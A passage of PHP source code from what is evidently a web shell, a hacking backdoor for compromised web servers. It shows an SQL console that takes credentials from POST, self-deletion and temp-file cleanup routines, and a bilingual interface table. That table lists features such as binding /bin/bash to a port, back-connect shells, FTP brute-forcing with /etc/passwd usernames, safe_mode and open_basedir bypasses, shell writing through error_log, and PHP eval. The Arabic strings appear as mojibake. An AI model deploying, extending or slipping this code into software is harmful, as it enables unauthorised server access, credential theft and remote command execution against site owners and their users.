1710	echo"<td>\n";
1711	$value="Write Your Own Query";
1712	goto(" ", $_SESSION['dbname'], $action, 'but', 'wyoq', $value );
1713	echo"</td>\n";
1714
1715	if (!isset($_POST['add']) && !isset($_POST['deltable']) && isset($tablename)){
1716	echo"<td>";
1717	//$tablename = $_POST['tablename'];
1718	$va="Add a $tablename Record";
1719	goto($tablename, $_SESSION['dbname'], 'alter.php', 'but', 'add', $va );
1720	echo"</td>\n";
1721	}
1722
1723	if (!isset($_POST['deltable'])){
1724	echo"<td>\n";
1725	searchtableform($tablename, $_SESSION['dbname']);
1726	echo"</td>\n";
1727	}
1728	echo"</tr></table>\n";
1729	echo"<br />\n";
1730
1731	//**************************************************
1732
1733	if(isset($_POST['addrec'])){
1734	// $showall=false;
1735	$result=addrecord($tablename, $_SESSION['dbname'], $_POST['array']);
1736	}elseif(isset($_POST['add'])){
1737	$showall=false;
1738	addform($tablename, $_SESSION['dbname']);
1739	}elseif(isset($_POST['delete'])){
1740	//delete record has been pushed
1741	// $showall=false;
1742	$whr=buildwhr($_POST['pk'], $_POST['pv']);
1743	$sql = "delete from $tablename where $whr";
1744	$result=exequery($sql, $tablename, $_SESSION['dbname']);
1745	}elseif (isset($_POST['edit'])){//Edit
1746	$showall=false;
1747	$whr = buildwhr( $_POST['pk'], $_POST['pv']);
1748	//$tablename = $_SESSION['tablename'];
1749	$sql= "Select * from $tablename where $whr";
1750
1751	$result=exequery($sql, $tablename, $_SESSION['dbname']);
1752	editform($tablename, $_SESSION['dbname'], $result, 'edit', $_POST['pk'], $_POST['pv']);
1753	}elseif(isset($_POST['editrec'])){
1754	// $showall=false;
1755	$result=editrec($_SESSION['dbname'],$tablename, $_POST['pk'], $_POST['pv'], $_POST['array']);
1756	}
1757	//************** Search **********************************
1758	if(isset($_POST['searchval'])){
1759	$searchval=$_POST['searchval'];
1760	}elseif(isset($_GET['searchval'])){
1761	$searchval=$_GET['searchval'];
1762	}else{
1763	$searchval="";
1764	}
1765
1766	if (isset($_GET['tablename'])){
1767	$tablename = $_GET['tablename'];
1768	}
1769
1770	if((isset($_POST['search'])\|\| isset($searchval)) && $searchval !=""){
1771	$result=searcht($tablename, $_SESSION['dbname'], $searchval);
1772	}else{
1773	//Display All
1774	$query = "select * from $tablename";
1775	$result=exequery($query, $tablename, $_SESSION['dbname']);
1776	}
1777
1778	//*************** Display record count ***************************************
1779	if($showall){
1780	$num_rows = mysql_num_rows($result);
1781	//Workout whick page to display
1782	if(!isset($_GET['pg']) && !isset($pg)){
1783	$beg=0;
1784	$pg=0;
1785	}else{
1786	if(isset($_GET['pback'])){
1787	$pg=$_GET['pg'];
1788	}else{
1789	$pg=$_GET['pg'];
1790	}
1791	if($pg < 0 ){
1792	$pg=0;
1793	}
1794	if($pg > $num_rows/$pagemax){
1795	$pg=ceil($num_rows/$pagemax)-1;
1796	}
1797	$beg = $pg * $pagemax;
1798
1799	}
1800	if (!isset($_POST['add'])){
1801	$pscrol=" ";
1802	$pagescrol =" ";
1803
1804	$pagescrol = whichpage($num_rows, $pagemax, $pg, $tablename, $searchval);
1805
1806	echo "$pagescrol\n"; //Display next Top page menu
1807
1808	$flds = mysql_num_fields($result);
1809	echo"<table border=0 width='100%'>\n";
1810	echo"<tr class=head><td></td><td></td>\n";
1811	$fields = mysql_list_fields( $_SESSION['dbname'], $tablename);
1812
1813	$z=0;
1814	$x =0;
1815	$pkfield=array();
1816
1817	//***********Display each of the field names.*************************
1818	for ($i = 0; $i < $flds; $i++) {
1819	echo "<td>".mysql_field_name($fields, $i)."</td>\n";
1820
1821	//Find the primary key
1822	$flagstring = mysql_field_flags ($result, $i);
1823	if(eregi("primary",$flagstring )){
1824	$pk[$z] = $i;
1825
1826	$pkfield[$z]= mysql_field_name($fields, $i);
1827	$z++;
1828	}
1829	}
1830	echo"</tr>\n";
1831	$tbl=$tablename;
1832	//if(isset($pk)){
1833	if($z > 0){
1834	$cpk=count($pk);
1835	}else{
1836	$cpk=0;
1837	}
1838
1839	//**********Display each row from the table.******************************
1840
1841	for ($s=$beg; $s < $beg + $pagemax; $s++){
1842	if($s < $num_rows){
1843	if (!mysql_data_seek ($result, $s)) {
1844	echo "Cannot seek to row $s\n";
1845	continue;
1846	}
1847	$row=mysql_fetch_array($result);
1848	if(!isset($pk)){
1849	$pk=" ";
1850	$pkfield= array();
1851	}
1852	displayrow($_SESSION['dbname'], $tbl, $pk, $pkfield, $cpk, $row, $flds);
1853	}
1854	}
1855	}
1856	echo"</table>\n";
1857	if (!isset($_POST['add']) && !isset($_POST['edit']) && !isset($_POST['deltable']) && !isset($_POST['droptab']) && !isset($_POST['wyoq']) && $tablename){
1858	echo"<br>";
1859	echo "$pagescrol\n"; //Display bottom next page menu
1860	}
1861	echo"<br><br>\n";
1862	}//showall
1863	if(isset($_POST['tablename'])){
1864	echo"<table border=0>";
1865	echo"<tr><td>";
1866	$tablename=$_POST['tablename'];
1867	$va="Alter Table $tablename";
1868	goto( $tablename, $_SESSION['dbname'],'alter.php', 'but', 'altertable', $va );
1869	echo"</td></tr>\n";
1870	echo"</table>\n";
1871	}
1872	}
1873	}
1874	display_foot();
1875	echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
1876
1877	if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
1878	{
1879	echo $head;
1880	$sql = new my_sql();
1881	$sql->db = $_POST['db'];
1882	$sql->host = $_POST['db_server'];
1883	$sql->port = $_POST['db_port'];
1884	$sql->user = $_POST['mysql_l'];
1885	$sql->pass = $_POST['mysql_p'];
1886	$sql->base = $_POST['mysql_db'];
1887	$querys = @explode(';',$_POST['db_query']);
1888	echo '<body bgcolor=#000000>';
1889	if(!$sql->connect()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
1890	else
1891	{
1892	if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=tahoma size=-2 color=red><b>áã íÓÊØíÚ ÊÍÏíÏ ÞÇÚÏå ÇáÈíÇäÇÊ</b></font></div>";
1893	else
1894	{
1895	foreach($querys as $num=>$query)
1896	{
1897	if(strlen($query)>5)
1898	{
1899	echo "<font face=tahoma size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
1900	switch($sql->query($query))
1901	{
1902	case '0':
1903	echo "<table width=100%><tr><td><font face=tahoma size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
1904	break;
1905	case '1':
1906	if($sql->get_result())
1907	{
1908	echo "<table width=100%>";
1909	foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
1910	$keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=tahoma size=-2><b> ", $sql->columns);
1911	echo "<tr><td bgcolor=#333333><font face=tahoma size=-2><b> ".$keys." </b></font></td></tr>";
1912	for($i=0;$i<$sql->num_rows;$i++)
1913	{
1914	foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
1915	$values = @implode(" </font></td><td><font face=tahoma size=-2> ",$sql->rows[$i]);
1916	echo '<tr><td><font face=tahoma size=-2> '.$values.' </font></td></tr>';
1917	}
1918	echo "</table>";
1919	}
1920	break;
1921	case '2':
1922	$ar = $sql->affected_rows()?($sql->affected_rows()):('0');
1923	echo "<table width=100%><tr><td><font face=tahoma size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
1924	break;
1925	}
1926	}
1927	}
1928	}
1929	}
1930	echo "<br><form name=form method=POST>";
1931	echo in('hidden','db',0,$_POST['db']);
1932	echo in('hidden','db_server',0,$_POST['db_server']);
1933	echo in('hidden','db_port',0,$_POST['db_port']);
1934	echo in('hidden','mysql_l',0,$_POST['mysql_l']);
1935	echo in('hidden','mysql_p',0,$_POST['mysql_p']);
1936	echo in('hidden','mysql_db',0,$_POST['mysql_db']);
1937	echo in('hidden','cmd',0,'db_query');
1938	echo "<div align=center>";
1939	echo "<font face=tahoma size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
1940	echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
1941	echo "</form>";
1942	echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
1943	}
1944	if(isset($_GET['delete']))
1945	{
1946	@unlink(__FILE__);
1947	}
1948	if(isset($_GET['tmp']))
1949	{
1950	@unlink("/tmp/bdpl");
1951	@unlink("/tmp/back");
1952	@unlink("/tmp/bd");
1953	@unlink("/tmp/bd.c");
1954	@unlink("/tmp/dp");
1955	@unlink("/tmp/dpc");
1956	@unlink("/tmp/dpc.c");
1957	}
1958	if(isset($_GET['phpini']))
1959	{
1960	echo $head;
1961	function U_value($value)
1962	{
1963	if ($value == '') return '<i>no value</i>';
1964	if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
1965	if ($value === null) return 'NULL';
1966	if (@is_object($value)) $value = (array) $value;
1967	if (@is_array($value))
1968	{
1969	@ob_start();
1970	print_r($value);
1971	$value = @ob_get_contents();
1972	@ob_end_clean();
1973	}
1974	return U_wordwrap((string) $value);
1975	}
1976	function U_wordwrap($str)
1977	{
1978	$str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
1979	return @preg_replace('!(&[^;])<wbr />([^;];)!', '$1$2<wbr />', $str);
1980	}
1981	if (@function_exists('ini_get_all'))
1982	{
1983	$r = '';
1984	echo '<table width=100%>', '<tr><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
1985	foreach (@ini_get_all() as $key=>$value)
1986	{
1987	$r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.$key.'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
1988	}
1989	echo $r;
1990	echo '</table>';
1991	}
1992	echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1993	die();
1994	}
1995	if(isset($_GET['cpu']))
1996	{
1997	echo $head;
1998	echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
1999	$cpuf = @file("cpuinfo");
2000	if($cpuf)
2001	{
2002	$c = @sizeof($cpuf);
2003	for($i=0;$i<$c;$i++)
2004	{
2005	$info = @explode(":",$cpuf[$i]);
2006	if($info[1]==""){ $info[1]="---"; }
2007	$r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
2008	}
2009	echo $r;
2010	}
2011	else
2012	{
2013	echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
2014	}
2015	echo '</table>';
2016	echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
2017	die();
2018	}
2019	if(isset($_GET['mem']))
2020	{
2021	echo $head;
2022	echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
2023	$memf = @file("meminfo");
2024	if($memf)
2025	{
2026	$c = sizeof($memf);
2027	for($i=0;$i<$c;$i++)
2028	{
2029	$info = explode(":",$memf[$i]);
2030	if($info[1]==""){ $info[1]="---"; }
2031	$r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
2032	}
2033	echo $r;
2034	}
2035	else
2036	{
2037	echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
2038	}
2039	echo '</table>';
2040	echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
2041	die();
2042	}
2043	$lang=array(
2044	'eng_text1' =>'Executed command',
2045	'eng_text2' =>'Execute command on server',
2046	'eng_text3' =>'Run command',
2047	'eng_text4' =>'Work directory',
2048	'eng_text5' =>'Upload files on server',
2049	'eng_text6' =>'Local file',
2050	'eng_text7' =>'Aliases',
2051	'eng_text8' =>'Select alias',
2052	'eng_butt1' =>'Execute',
2053	'eng_butt2' =>'Upload',
2054	'eng_text9' =>'Bind port to /bin/bash',
2055	'eng_text10'=>'Port',
2056	'eng_text11'=>'Password for access',
2057	'eng_butt3' =>'Bind',
2058	'eng_text12'=>'back-connect',
2059	'eng_text13'=>'IP',
2060	'eng_text14'=>'Port',
2061	'eng_butt4' =>'Connect',
2062	'eng_text15'=>'Upload files from remote server',
2063	'eng_text16'=>'With',
2064	'eng_text17'=>'Remote file',
2065	'eng_text18'=>'Local file',
2066	'eng_text19'=>'Exploits',
2067	'eng_text20'=>'Use',
2068	'eng_text21'=>' New name',
2069	'eng_text22'=>'datapipe',
2070	'eng_text23'=>'Local port',
2071	'eng_text24'=>'Remote host',
2072	'eng_text25'=>'Remote port',
2073	'eng_text26'=>'Use',
2074	'eng_butt5' =>'Run',
2075	'eng_text28'=>'Work in safe_mode',
2076	'eng_text29'=>'ACCESS DENIED',
2077	'eng_butt6' =>'Change',
2078	'eng_text30'=>'Cat file',
2079	'eng_butt7' =>'Show',
2080	'eng_text31'=>'File not found',
2081	'eng_text32'=>'Eval PHP code',
2082	'eng_text33'=>'Test bypass open_basedir with cURL functions',
2083	'eng_butt8' =>'Test',
2084	'eng_text34'=>'Test bypass safe_mode with include function',
2085	'eng_text35'=>'Test bypass safe_mode with load file in mysql',
2086	'eng_text36'=>'Database . Table',
2087	'eng_text37'=>'Login',
2088	'eng_text38'=>'Password',
2089	'eng_text39'=>'Database',
2090	'eng_text40'=>'Dump database table',
2091	'eng_butt9' =>'Dump',
2092	'eng_text41'=>'Save dump in file',
2093	'eng_text42'=>'Edit files',
2094	'eng_text43'=>'File for edit',
2095	'eng_butt10'=>'Save',
2096	'eng_text44'=>'Can\'t edit file! Only read access!',
2097	'eng_text45'=>'File saved',
2098	'eng_text46'=>'Show phpinfo()',
2099	'eng_text47'=>'Show variables from php.ini',
2100	'eng_text48'=>'Delete temp files',
2101	'eng_butt11'=>'Edit file',
2102	'eng_text49'=>'Delete script from server',
2103	'eng_text50'=>'View cpu info',
2104	'eng_text51'=>'View memory info',
2105	'eng_text52'=>'Find text',
2106	'eng_text53'=>'In dirs',
2107	'eng_text54'=>'Find text in files',
2108	'eng_butt12'=>'Find',
2109	'eng_text55'=>'Only in files',
2110	'eng_text56'=>'Nothing :(',
2111	'eng_text57'=>'Create/Delete File/Dir',
2112	'eng_text58'=>'name',
2113	'eng_text59'=>'file',
2114	'eng_text60'=>'dir',
2115	'eng_butt13'=>'Create/Delete',
2116	'eng_text61'=>'File created',
2117	'eng_text62'=>'Dir created',
2118	'eng_text63'=>'File deleted',
2119	'eng_text64'=>'Dir deleted',
2120	'eng_butt65'=>'Create',
2121	'eng_text65'=>'Create',
2122	'eng_text66'=>'Delete',
2123	'eng_text67'=>'Chown/Chgrp/Chmod',
2124	'eng_text68'=>'Command',
2125	'eng_text69'=>'param1',
2126	'eng_text70'=>'param2',
2127	'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
2128	'eng_text72'=>'Text for find',
2129	'eng_text73'=>'Find in folder',
2130	'eng_text74'=>'Find in files',
2131	'eng_text75'=>'* you can use regexp',
2132	'eng_text76'=>'Search text in files via find',
2133	'eng_text80'=>'Type',
2134	'eng_text81'=>'Net',
2135	'eng_text82'=>'Databases',
2136	'eng_text83'=>'Run SQL query',
2137	'eng_text84'=>'SQL query',
2138	'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
2139	'eng_text86'=>'Download files from server',
2140	'eng_butt14'=>'Download',
2141	'eng_text87'=>'Download files from remote ftp-server',
2142	'eng_text88'=>'FTP-server:port',
2143	'eng_text89'=>'File on ftp',
2144	'eng_text90'=>'Transfer mode',
2145	'eng_text91'=>'Archivation',
2146	'eng_text92'=>'without archivation',
2147	'eng_text93'=>'FTP',
2148	'eng_text94'=>'FTP-bruteforce',
2149	'eng_text95'=>'Users list',
2150	'eng_text96'=>'Can\'t get users list',
2151	'eng_text97'=>'checked: ',
2152	'eng_text98'=>'success: ',
2153	'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
2154	'eng_text100'=>'Send file to remote ftp server',
2155	'eng_text101'=>'Use reverse (user -> resu) login for password',
2156	'eng_text102'=>'Mail',
2157	'eng_text103'=>'Send email',
2158	'eng_text104'=>'Send file to email',
2159	'eng_text105'=>'To',
2160	'eng_text106'=>'From',
2161	'eng_text107'=>'Subj',
2162	'eng_butt15'=>'Send',
2163	'eng_text108'=>'Mail',
2164	'eng_text109'=>'Hide',
2165	'eng_text110'=>'Show',
2166	'eng_text111'=>'SQL-Server : Port',
2167	'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
2168	'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
2169	'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
2170	'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
2171	'eng_text116'=>'Copy from',
2172	'eng_text117'=>'to',
2173	'eng_text118'=>'File copied',
2174	'eng_text119'=>'Cant copy file',
2175	'eng_err0'=>'Error! Can\'t write in file ',
2176	'eng_err1'=>'Error! Can\'t read file ',
2177	'eng_err2'=>'Error! Can\'t create ',
2178	'eng_err3'=>'Error! Can\'t connect to ftp',
2179	'eng_err4'=>'Error! Can\'t login on ftp server',
2180	'eng_err5'=>'Error! Can\'t change dir on ftp',
2181	'eng_err6'=>'Error! Can\'t sent mail',
2182	'eng_err7'=>'Mail send',
2183	'eng_text200'=>'read file from vul copy()',
2184	'eng_text202'=>'where file in server',
2185	'eng_text300'=>'read file from vul curl()',
2186	'eng_text203'=>'read file from vul ini_restore()',
2187	'eng_text204'=>'write shell from vul error_log()',
2188	'eng_text205'=>'write shell in this side',
2189	'eng_text206'=>'read dir',
2190	'eng_text207'=>'read dir from vul reg_glob',
2191	'eng_text208'=>'execute with function',
2192	'eng_text209'=>'read dir from vul root',
2193	'eng_text210'=>'DeZender ',
2194	'eng_text211'=>'::safe_mode off::',
2195	'eng_text212'=>'colse safe_mode with php.ini',
2196	'eng_text213'=>'colse security_mod with .htaccess',
2197	'eng_text214'=>'Admin name',
2198	'eng_text215'=>'IRC server ',
2199	'eng_text216'=>'#room name',
2200	'eng_text217'=>'server',
2201	'eng_text218'=>'write ini.php file to close safe_mode with ini_restore vul',
2202	'eng_text219'=>'Get file to server in safe_mode and change name',
2203	'eng_text220'=>'show file with symlink vul',
2204	'eng_text221'=>'zip file in server to download',
2205	'ar_text222'=>'2 symlink use vul',
2206	'ar_text223'=>'read file from funcution',
2207	'ar_text224'=>'read file from PLUGIN ',
2208
2209	/* --------------------------------------------------------------- */
2210	'ar_text1' =>'ÇáÇãÑ ÇáãäÝÐ',
2211	'ar_text2' =>'ÊäÝíÐ ÇáÇæÇãÑ Ýí ÇáÓíÑÝÑ',
2212	'ar_text3' =>'ÇãÑ ÇáÊÔÛíá',
2213	'ar_text4' =>'ãßÇä Úãáß ÇáÇä Úáì ÇáÓíÑÝÑ',
2214	'ar_text5' =>'ÑÝÚ ãáÝ Çáì ÇáÓíÑÝÑ',
2215	'ar_text6' =>'ãÓÇÑ ãáÝß',
2216	'ar_text7' =>'ÇæÇãÑ ÌÇåÒå',
2217	'ar_text8' =>'ÇÎÊÑ ÇáÇãÑ',
2218	'ar_butt1' =>'ÊäÝíÐ',
2219	'ar_butt2' =>'ÑÝÜÚ',
2220	'ar_text9' =>'ÝÊÍ ÈæÑÊ Ýí ÇáÓíÑÝÑ Úáì /bin/bash',
2221	'ar_text10'=>'ÈÜæÑÊ',
2222	'ar_text11'=>'ÈÇÓæÑÏ ááÏÎæá',
2223	'ar_butt3' =>'ÝÊÍ',
2224	'ar_text12'=>'ÃÊÕÜÇá ÚÜßÓí',
2225	'ar_text13'=>'ÇáÇí Èí',
2226	'ar_text14'=>'ÇáãäÝÐ',
2227	'ar_butt4' =>'ÃÊÜÕÇá',
2228	'ar_text15'=>'ÓÍÈ ãáÝÇÊ Çáì ÇáÓíÑÝÑ',
2229	'ar_text16'=>'Úä ØÑíÞ',
2230	'ar_text17'=>'ÑÇÈØ ÇáãáÝ',
2231	'ar_text18'=>'ãßÇä äÒæáå',
2232	'ar_text19'=>'Exploits',
2233	'ar_text20'=>'ÅÓÊÎÏã',
2234	'ar_text21'=>'ÇáÇÓã ÇáÌÏíÏ',
2235	'ar_text22'=>'ÇäÈæÈ ÇáÈíÇäÇÊ',
2236	'ar_text23'=>'ÇáÈæÑÊ ÇáãÍáí',
2237	'ar_text24'=>'ÇáÓíÑÝÑ ÇáÈÚíÏ',
2238	'ar_text25'=>'ÇáãäÝÐ ÇáÈÚíÏ',
2239	'ar_text26'=>'ÇÓÊÎÏã',
2240	'ar_butt5' =>'ÊÔÛíá',
2241	'ar_text28'=>'ÇáÚãá Ýí ÇáæÖÚ ÇáÇãä',
2242	'ar_text29'=>'ããäæÚ ÇáÏÎæá',
2243	'ar_butt6' =>'ÊÛíÑ',
2244	'ar_text30'=>'ÚÑÖ ãáÝ',
2245	'ar_butt7' =>'ÚÑÖ',
2246	'ar_text31'=>'ÇáãáÝ ÛíÑ ãæÌæÏ',
2247	'ar_text32'=>'ÊäÝíÐ ßæÏ php Úä ØÑíÞ ÏÇáå eval',
2248	'ar_text33'=>'Test bypass open_basedir with cURL functions',
2249	'ar_butt8' =>'ÇÎÊÈÇÑ',
2250	'ar_text34'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå include',
2251	'ar_text35'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå Mysql',
2252	'ar_text36'=>'ÇáÞÇÚÏÉ . ÇáÌÏæá',
2253	'ar_text37'=>'ÇÓã ÇáãÓÊÎÏã',
2254	'ar_text38'=>'ßáãÉ ÇáãÑæÑ',
2255	'ar_text39'=>'ÇáÞÇÚÏÉ',
2256	'ar_text40'=>'äÓÎÉ ãä ÌÏÇæá ÇáÞÇÚÏÉ',
2257	'ar_butt9' =>'äÓÎÉ',
2258	'ar_text41'=>'ÍÝÙ ÇáäÓÎÉ Ýí',
2259	'ar_text42'=>'ÊÚÏíá ÇáãáÝÇÊ',
2260	'ar_text43'=>'ÇáãáÝ ÇáãÑÇÏ ÊÚÏíáå',
2261	'ar_butt10'=>'ÍÝÙ',
2262	'ar_text44'=>'áÇÊÓÊØíÚ ÇáÊÚÏíá Úáì åÐÇ ÇáãáÝ ÝÞØ ÊÞÑÃ',
2263	'ar_text45'=>'Êã ÇáÍÝÙ',
2264	'ar_text46'=>'ÚÑÖ phpinfo()',
2265	'ar_text47'=>'ÑÄíÉ ÇáãÊÛíÑÇÊ Ýí php.ini',
2266	'ar_text48'=>'ãÓÍ ãáÝÇÊ ÇáÜ temp',
2267	'ar_butt11'=>'ÊÍÑíÑ ÇáãáÝ',
2268	'ar_text49'=>'ãÓÍ ÇáÓßÑÈÊ ãä ÇáÓíÑÝÑ',
2269	'ar_text50'=>'ÚÑÖ ãÚáæãÇÊ ÇáÐÇßÑÉ ÇáÑÆíÓíÉ',
2270	'ar_text51'=>'ÚÑÖ ãÚáæãÇÊ ÇáÐÇßÑÉ',
2271	'ar_text52'=>'ÈÍË äÕ',
2272	'ar_text53'=>'Ýí ÇáãÓÇÑ',
2273	'ar_text54'=>'ÈÍË Úä äÕ Ýí ÇáãáÝÇÊ',
2274	'ar_butt12'=>'ÈÍË',
2275	'ar_text55'=>'ÝÞØ Ýí ÇáãáÝÇÊ',
2276	'ar_text56'=>'áÇíæÌÏ :(',
2277	'ar_text57'=>'ÇäÔÇÁ/ãÓÍ ãáÝ/ãÌáÏ',
2278	'ar_text58'=>'ÇáÇÓã',
2279	'ar_text59'=>'ãáÝ',
2280	'ar_text60'=>'ãÌáÏ',
2281	'ar_butt13'=>'ÅäÔÇÁ /ãÓÍ',
2282	'ar_text61'=>'Êã ÅäÔÇÁ ÇáãáÝ',
2283	'ar_text62'=>'Êã ÅäÔÇÁ ÇáãÌáÏ',
2284	'ar_text63'=>'Êã ãÓÍ ÇáãáÝ',
2285	'ar_text64'=>'Êã ãÓÍ ÇáãÌáÏ',
2286	'ar_butt65'=>'ÅäÔÇÁ',
2287	'ar_text66'=>'ãÓÍ',
2288	'ar_text67'=>'ÇáÊÕÑíÍ/ÇáãÓÊÎÏã/ÇáãÌãæÚÉ',
2289	'ar_text68'=>'ÇãÑ',
2290	'ar_text69'=>'ÅÓã ÇáãáÝ',
2291	'ar_text70'=>'ÇáÊÕÑíÍ',
2292	'ar_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
2293	'ar_text72'=>'ÇáäÕ ÇáãÑÇÏ',
2294	'ar_text73'=>'ÈÍË Ýí ÇáãÌáÏÇÊ',
2295	'ar_text74'=>'ÈÍË Ýí ÇáãáÝÇÊ',
2296	'ar_text75'=>'* you can use regexp',
2297	'ar_text76'=>'ÇáÈÍË Úä äÕ Ýí ãáÝÇÊ ÈæÇÓØå find',
2298	'ar_text80'=>'ÇáäæÚ',
2299	'ar_text81'=>'ÇáÅÊÕÇáÇÊ',
2300	'ar_text82'=>'ÞæÇÚÏ ÇáÈíÇäÇÊ',
2301	'ar_text83'=>'ÊÔÛíá ÇãÑ ÇÓÊÚáÇã',
2302	'ar_text84'=>'ÇÓÊÚáÇã ÞÇÚÏÉ',
2303	'ar_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
2304	'ar_text86'=>'ÊäÒíá ãáÝÇÊ ãä ÇáÓíÑÝÑ',
2305	'ar_butt14'=>'ÊÍãíá',
2306	'ar_text87'=>'ÊäÒíá ãáÝÇÊ ãä ÎÇÏã ÇáÇÝ Êí Èí',
2307	'ar_text88'=>'ÓíÑÝÑ ÇáÇÝ Êí Èí:ÇáãäÝÐ',
2308	'ar_text89'=>'ãáÝ Ýí ÇáÇÝ Êí Èí',
2309	'ar_text90'=>'ÇáÊÍæíá Çáì',
2310	'ar_text91'=>'ÇÑÔÝÉ',
2311	'ar_text92'=>'ãä ÛíÑ ÇáÇÑÔÝÉ',
2312	'ar_text93'=>'ÇáÇÝ Êí Èí',
2313	'ar_text94'=>'ÊÎãíä ÇáÇÝ Êí Èí',
2314	'ar_text95'=>'ÞÇÆãÉ ÇáãÓÊÎÏãíä',
2315	'ar_text96'=>'áã íÓÊØÚ ÓÍÈ ÞÇÆãÉ ÇáãÓÊÎÏãíä',
2316	'ar_text97'=>'Êã ÇáÝÍÕ: ',
2317	'ar_text98'=>'Êã ÈäÌÇÍ: ',
2318	'ar_text99'=>'* ÇÓÊÎÏã ÇÓãÇÁ ÇáãÓÊÎÏãíä Ýí ãáÝ /etc/passwd áÏÎæá ááÜ ftp',
2319	'ar_text100'=>'ÇÑÓÇá ãáÝ Çáì ÎÇÏã ÇáÇÝ Êí Èí',
2320	'ar_text101'=>'ÇÓÊÎÏã ÇáÇÓÇãí ãÚßæÓå áÊÎãíäåÇ',
2321	'ar_text102'=>'ÎÏãÇÊ ÇáÈÑíÏ',
2322	'ar_text103'=>'ÇÑÓÇá ÈÑíÏ',
2323	'ar_text104'=>'ÇÑÓÇá ãáÝ Çáì ÇáÇíãíá',
2324	'ar_text105'=>'Åáì',
2325	'ar_text106'=>'ãÜä',
2326	'ar_text107'=>'ÇáãæÖæÚ',
2327	'ar_butt15'=>'ÅÑÓÇá',
2328	'ar_text108'=>'ÇáÑÓÇáÉ',
2329	'ar_text109'=>'ãÎÝí',
2330	'ar_text110'=>'ÚÑÖ',
2331	'ar_text111'=>'ÓíÑÝÑ ÞæÇÚÏ ÇáÈíÇäÇÊ : ÇáãäÝÐ',
2332	'ar_text112'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ ÏÇáå mb_send_mail',
2333	'ar_text113'=>'ÞÑÇÆÉ ãÍÊæì ÇáãÌáÏÇÊ Úä ØÑíÞ via imap_list',
2334	'ar_text114'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ via imap_body',
2335	'ar_text115'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ compress.zlib://',
2336	'ar_text116'=>'äÓÎ ãä',
2337	'ar_text117'=>'Çáì',
2338	'ar_text118'=>'Êã äÓÎ ÇáãáÝ',
2339	'ar_text119'=>'áÇíÓÊØíÚ ÇáäÓÎ',
2340	'ar_err0'=>'ÎØÇÁ ! áÇíãßä ÇáßÊÇÈÉ Úáì åÐÇ ÇáãáÝ ',
2341	'ar_err1'=>'ÎØÇÁ ! ÛíÑ ÞÇÏÑ Úáì ÞÑÇÆå åÐÇ ÇáãáÝ ',
